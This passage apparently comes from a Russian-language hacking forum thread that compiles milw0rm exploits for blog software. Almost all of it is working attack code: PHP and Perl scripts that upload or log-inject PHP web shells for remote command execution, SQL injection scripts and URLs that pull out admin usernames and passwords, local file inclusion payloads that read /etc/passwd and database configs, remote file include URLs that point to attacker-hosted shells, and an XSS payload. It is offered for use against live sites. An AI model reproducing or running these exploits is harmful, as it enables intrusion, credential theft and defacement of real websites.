        $res $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword=' or 1=if(ascii(substring((select password from ".$prefix."members where id=$user_id),$i,1))=$num,1,(select 1 union select 2))/*");
        if($res->as_string =~ /MySQL/i) { return 0;}
        else {return 1;}
    }
         
    sub test_vuln()
    {
        $xpl LWP::UserAgent->new( ) or die;
        $res $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword='");
        if($res->is_success
        {
            $rep '';
            if($res->as_string =~ /MySQL/i
            { 
                $print->insert('end',"- BLOG VULNERABLE\n");
            }
            else { $print->insert('end',"- BLOG UNVULNERABLE\n");} 
        }
    }

# milw0rm.com [2008-01-07] 
zBlog v1.2 SQL Injection

Код:
http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--
mBlog 1.2 Remote File Disclosure

Уязвимый код:

PHP код:
./includes/tpl.php41-56:
    ...
41   // load_tpl
42   // loding a template file into a varible.
43   // use quick_tpl to display template
44  function load_tpl ($path)
45  {
46      $tpl '';
47      global $tpl_block;
48
49      if (substr ($path, -4) == '.tpl')
50      {
51          if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path '../'.$path;
52          if (!file_exists ($path)) die ("<B>Template $path not found! Contact webmaster.</B>");
53          $fp fopen($path,'r');
54          while(!feof($fp)) $tpl .= fgets($fp,4096);
55          fclose ($fp);
56      }
    ...

load_tpl() 'loading a template file into a varible.' ;]


  ./index.php24-30:
    ...
24   // proses cmd
25   switch ($mode)
26   {
27      case 'page':
28       $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0);
29       flush_tpl ();
30      break;
    ... 
Цитата:
(%69%6E%63%6C%75%64%65%73 = includes)
http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00
http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00
Quick and Dirty Blog 0.4 Local File Inclusion

Цитата:
/categories.php?theme=../../../../../../../../../etc/passwd%00
LightBlog 8.4.1.1 Remote Code Execution

PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
LightBlog 8.4.1.1 Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love

";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path 
Host:          target server (ip/hostname)
Path:          path of lightblog

Example:
php ".$argv[0]." localhost /lightblog/ dir";

die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0$i<=strlen($string)-1$i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy$host$port$html$proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
        $c preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3$i<=$argc-1$i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);


$port=80;
$proxy="";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "Step 0 - If Shell already exists, run it..\r\n";
$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
  echo "Exploit succeeded...\r\n";
  $temp=explode("666999",$html);
  die("\r\n".$temp[1]."\r\n");
}

echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';
//Retrieving the "confirmation" code
$packet ="GET ".$p."register.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is'$html$fuori);

$conf_code $fuori[1];
$rand_code $fuori[2];

//Doing the registration
$data="rand=$rand_code&val=$conf_code&username_post=Piggy_Marty&pwd1_post=DAFORNO_IMPERAT&pwd2_post=DAFORNO_IMPERAT&name_post=Piggy_Marty&email_post=hawkgotyou@gmail.com";
$packet="POST ".$p."register.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: localhost\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

echo 'Step 2 - Promoting Piggy_Marty to admin level..';
$data="type_post=admin&username_post=Piggy_Marty";
$packet="POST ".$p."cp_memberedit.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: localhost\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

echo 'Step 3 - Uploading Shell Creator..';
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"image\"; filename=\"piggy_marty_creator.php\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="<?php
\$fp=fopen('piggy_marty.php','w');
fputs(\$fp,'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
\$_GET[cmd]=stripslashes(\$_GET[cmd]);
}
echo 666999;
passthru(\$_GET[cmd]);
echo 666999;
?>');
fclose(\$fp);
chmod('piggy_marty.php',777);
?>\r\n";
$data.='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="title"

Not so good if you see this..
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="post"

An Exploit has attacked your site.. contact hawkgotyou@gmail.com for more details
-----------------------------7d529a1d23092a--
';
$packet="POST ".$p."main.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/\r\n";
$packet.="Cookie: Lightblog_username=Piggy_Marty&Lightblog_password=DAFORNO_IMPERAT\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

echo 'Step 4 - Executing Creator..';
$packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);

echo "Step 5 - Execute Commands..\r\n";
$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
  echo "Exploit succeeded...\r\n";
  $temp=explode("666999",$html);
  die("\r\n".$temp[1]."\r\n");
}

# Coded With BH Fast Generator v0.1
?>

# milw0rm.com [2007-10-09]
Furkan Taştan Blog SQL Injection

Цитата:
Username : /kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
Password : /kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar
JBlog 1.0 SQL Injection

PHP код:
##################################################
#    Script....................................: JBlog ver 1.0
#    Script Site...........................: http://www.jmuller.net/jblog/index.php
#    Vulnerability........................: Remote SQL injection Exploit
#    Access..................................: Remote
#    level......................................: Dangerous
#    Author..................................: S4mi 
#    Contact.................................: S4mi[at]LinuxMail.org 
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL]  (shoud have access to admin area "use my last JBlog Xploit")
#Probably Other files are affected
#*************************************
#Usage  :       C:\Xploit.pl  127.0.0.1  /Jblog/
#Result Screen Shout :
#*************************************
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Enjoy.
#  + ---------------- +
#  + Password: e10adc3949ba59abbe56e057f20f883e
#  + Username: admin
###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1]));

$host $ARGV[0];
$path $ARGV[1];

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
                                
die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT"[OK]";

$inject "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*";    

syswrite STDOUT ,"\n Sending Data ...";

print $sock "GET $path/index.php?id='$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /class='titre'>(.*?)<\/span>/){
print "+ Exploit succeed! Enjoy.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
}    
if($answer =~ / '(.*?)' /){
print "+ Username: $1\n";
}
}

sub usage{
    print "\nUsage   : perl $0 host /path/ ";
    print "\nExemple : perl $0 www.victim.com /JBlog/\n";
    exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script.................: JBlog ver 1.0
Script Site............: http://www.jmuller.net/jblog/index.php
Vulnerability..........: Remote SQL injection Exploit
Access.................: Remote
level..................: Dangerous 
Author.................: S4mi
Contact................: S4mi[at]LinuxMail.org 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

# milw0rm.com [2007-09-14] 

Ded MustD!e 09.06.2008 06:03
SimpleBlog 3.0 SQL Injection

PHP код:
#!/usr/bin/perl

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
#              SimpleBlog 3.0 [ comments_get.asp ]               #
#                    ] Remote SQL Injection [                    #
#                                                                #
#              [c]ode by TrinTiTTY [at] g00ns.net                #
#                 Vulnerability by MurderSkillz                  #
#                                                                #
#      shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox,   #
#              Canuck, a59, sess, bernard, + the rest of g00ns   #
#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

use LWP::UserAgent;

$host = @ARGV[0];
$ua LWP::UserAgent->new;

my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';

if (@ARGV 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &xpl( ) }
sub xpl( ) {
  &top( );
  print "\n [~] Connecting\n";
  $res $ua->get("http://$host/$inject");

  $con $res->content;
  print "\n [~] Checking for admin info\n";
  if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi)
  {
     print "\n\t [+] Admin user: $1\n";
  }
  if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi)
  {
     print "\n\[+] Admin password: $2\n";
     print "\[+] Complete\n";
  }
  else {
      print "\[-] Unable to retrieve admin info\n";
      exit(0);
  }
}
sub top( )
{
  print q {
  ##################################################################
  #             SimpleBlog 3.0  [ comments_get.asp ]               #
  #                    ] Remote SQL Injection [                    #
  #                                                                #
  #                [c]ode by TrinTiTTY [at] g00ns.net              #
  #                   Vulnerability by MurderSkillz                #
  ##################################################################
  }
}
sub usage( )
{
  print "\n Usageperl simpleblog3.pl <host>\n";
  print "\n Exampleperl simpleblog3.pl www.example.com/path\n\n";
  exit(0);
}

# milw0rm.com [2007-07-28] 
BlogSite Professional SQL Injection

Код:
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*
6ALBlog SQL Injection

Код:
http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,concat(user,0x3a,pass),3,4,5,6,7%20from%20blog_users/*
BlogMe 3.0 SQL Injection

Код:
/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin
Archangel Weblog 0.90.02 Local File Inclusion

Код:
http://Target.com/blog/index.php?index=../../../../etc/passwd%00
sBLOG 0.7.3 Beta Local File Inclusion

PHP код:
#!/usr/bin/perl
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit
# D.Script: http://sourceforge.net/projects/sblog/
# V.Code:
# if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php'))
#     require('lang/' . $conf_lang_default . '.php');
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx : w4ck1ng.com & cyb3rt & 020

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

if (@ARGV < 3) {
print "
===============================================================
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit  #
#           Gold.pl [Victim] / (apachepath)                   #
#        Ex: Gold.pl [Victim] / ../logs/error.log             #
===============================================================
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group  #
#            Thanx : w4ck1ng.com & cyb3rt & 020               #
===============================================================
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Code is injecting in logfiles...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";

#now include parameter

print $socket "GET ".$path."/inc/lang.php?conf_lang_default=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";

while ($raspuns = <$socket>)
{

print $raspuns;
}

print "[shell] ";
$cmd = <STDIN>;
}

# milw0rm.com [2007-03-29]
WBBlog (XSS/SQL)

Код:
index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*
Цитата:
index.php?cmd=viewentry&e_id="><script>alert('Anti chat')</script>
WebLog File Disclosure

Цитата:
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php <<< username&password(md5)
BP Blog 7.0 SQL Injection

Код:
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Админка:
Цитата:
/admin_default.asp
b2 Blog <= 0.5 Remote File Include

Код:
http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?
BLOG:CMS <= 4.1.3 Remote Inclusion

Код:
http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin
WikyBlog 1.3.2 Local File Inclusion

PHP код:
#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          WikyBlog Local File Inclusion Exploit                                #
#################################################################################################
# Software: WikyBlog 1.3                                                                        #
#                                                                                               #
# Vendor: http://www.wikyblog.com/                                                              #
#                                                                                               #
# Released: 2006/12/01                                                                          #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for WikyBlog administrator                 #
# testing purposes only!                                                                        #
#                                                                                               #
# This exploit makes use of a local file inclusion exploit in                                   #
# WikyBlog to allow command execution. Firstly it locates an                                    #
# access_log, or error_log then it inserts a PHP Shell into                                     #
# the log file and returns a link for command execution.                                        #
#                                                                                               #
# include/WBmap.php?l=file_to_include%00                                                        #
# register_globals being on does not affect this vulnerability                                  #
#################################################################################################

use IO::Socket;
use Switch;

$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$folder = @ARGV[1]; # /wikyblog/

sub Header()
{
        print q {#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          WikyBlog Local File Inclusion Exploit                                #
#################################################################################################
};
}

sub Usage()
{
        print q {Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
};
        exit();
}

Header();

if (!$target || !$folder) {
        Usage(); }

# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
        print $sock "Host: $target\n";
        print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
        print $sock "Accept: text/html\n";
        print $sock "Connection: close\n\n\r\n";

        #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
        $out = "";
        while ($answer = <$sock>) {
                $out.=$answer; }
        close($sock);
        if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
                print "[+] Log file found! [".$path."] \n";
                $log = $path; }
}

if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }

print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";

print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";

# milw0rm.com [2006-12-01]
SimpleBlog <= 2.3 SQL Injection

Код:
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
BrewBlogger 1.3.1 SQL Injection

PHP код:
#!/usr/bin/perl
###########################################################################################
#Target:
#
#       BewBlogger 1.3.1
#       http://brewblogger.zkdigital.com
#
#Vulnerability:
#
#       SQL Injection
#
#Description:
#
#       BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
#       Since each user entry contains an auto-incrementing ID number, it is possible to
#       enumerate all user names and passwords stored in the 'users'database by iterating
#       through every possible ID number.
#
#Vulnerable Code (truncated):
#
#       $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#       $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#       $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
#       This script will produce a URL which will reveal the user name and password for
#       the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
#       the first user). The user name will be listed as "Method:" under 'General
#       Information', and the password will be listed as "Cost:".
#
#Usage:
#       ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
#       ./brewblogger.pl www.beerblog.com 3
#       ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
#       intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
###########################################################################################


print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
#                                         #
# Discovered and coded by: Craig Heffner  #
###########################################
';

if(!$ARGV[0] || $ARGV[0eq "-h"){
       print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
       exit;
}


if(!$ARGV[1]){
       $id 2;
} else {
       $id $ARGV[1];
}

$url "http://" $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
$a 1;

while($a 211){
       if($a == 8){
               $string .= "user_name,";
       } elsif($a == 9){
               $string .= "password,";
       } elsif($a == 210){
               $string .= "1";
       } else {
               $string .= "1,";
       }
       $a++;
}

print "\n\nUse the following URL:\n\n" $url $string "+FROM+users+WHERE+id=" $id "\n";
exit;

# milw0rm.com [2006-11-10] 
IrayoBlog 0.2.4 Remote File Include

Код:
http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?
vBlog / C12 0.1 Remote File Include

Цитата:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?

Ded MustD!e 09.06.2008 06:15
Light Blog Multiple Vulnerabilities

PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Light Blog Multiple Vulnerabilities Exploit\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host:             target server (ip/hostname)\r\n";
echo "Path:             path to LightBlog\r\n";
echo "AttackType:       1 - Create New Post (Title must be of one word)\r\n";
echo "            |-> Related: Title Post\r\n";
echo "            |-> Es: php ".$argv[0]." localhost /blog/ 1 Hacked I Got You\r\n\r\n";
echo "          2 - Deface Blog (With XSS)\r\n";
echo "            |-> Related: WebPage\r\n";
echo "            |-> Es: php ".$argv[0]." localhost /blog/ 2 http://site.com/\r\n\r\n";
echo "          3 - Deface Blog (Deleting blog.php)\r\n";
echo "            |-> Related: NickName\r\n";
echo "            |-> Es: php ".$argv[0]." localhost /blog/ 3 BlackHawk\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}

/*
There are some critical vulnerabilities in this quite simple Blog Engine..

1 - You do not need to know the right password to send a new Post (no cecking);
2 - You can erase (even with mq=on) all file that are stored on the server:

[...]
$t = stripslashes($t);
[...]
$fc = fopen ("blog_comments/$t.txt", "w");
fwrite ($fc, "");
[...]

3-Using point No 1 you can do some XSS couse there isn't any anti-Xss code for admins
4-If mq=on than you can deface the site (but no injecting PHP cause < and > are properly parsed)

sorry for my bad english,

BlackHawk hawkgotyou@gmail.com
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0$i<=strlen($string)-1$i++)
 {
  if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  {$result.="  .";}
  else
  {$result.="  ".$string[$i];}
  if (strlen(dechex(ord($string[$i])))==2)
  {$exa.=" ".dechex(ord($string[$i]));}
  else
  {$exa.=" 0".dechex(ord($string[$i]));}
  $cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
 global $proxy$host$port$html$proxy_regex;
 if ($proxy=='') {
   $ock=fsockopen(gethostbyname($host),$port);
   if (!$ock) {
     echo 'No response from '.$host.':'.$port; die;
   }
 }
 else {
       $c preg_match($proxy_regex,$proxy);
   if (!$c) {
     echo 'Not a valid proxy...';die;
   }
   $parts=explode(':',$proxy);
   echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
